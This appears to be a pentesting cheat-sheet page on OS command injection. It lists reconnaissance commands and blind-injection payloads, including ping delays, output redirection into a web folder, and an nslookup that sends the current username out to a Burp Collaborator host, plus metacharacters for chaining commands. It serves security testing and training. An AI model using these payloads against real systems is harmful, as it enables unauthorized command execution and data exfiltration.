🟩OS Command Injection

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.

Useful commands

Purpose of command

Linux

Windows

Name of current user

whoami

Operating system

uname -a

ver

Network configuration

ifconfig -a

ipconfig /all

Network connections

netstat -tunl

netstat -an

Running processes

ps -ef

tasklist

Blind OS command injection

Method

Command

Time delays

&ping -c 10 127.0.0.1

||ping+-c+10+127.0.0.1+||

Redirecting output

||whoami>/var/www/images/output.txt||

Out-Of-Band (OOB) DNS lookup. You can use Burp Collaborator

||nslookup+`whoami`.x.burpcollaborator.net||

||nslookup+x.burpcollaborator.net||

Useful meta characters

&
&&
|
||
;
Newline (0x0a or \n)
`injected command `
$( injected command )

PreviousDirectory Traversal NextServer-Side Request Forgery (SSRF)

Last updated 1 year ago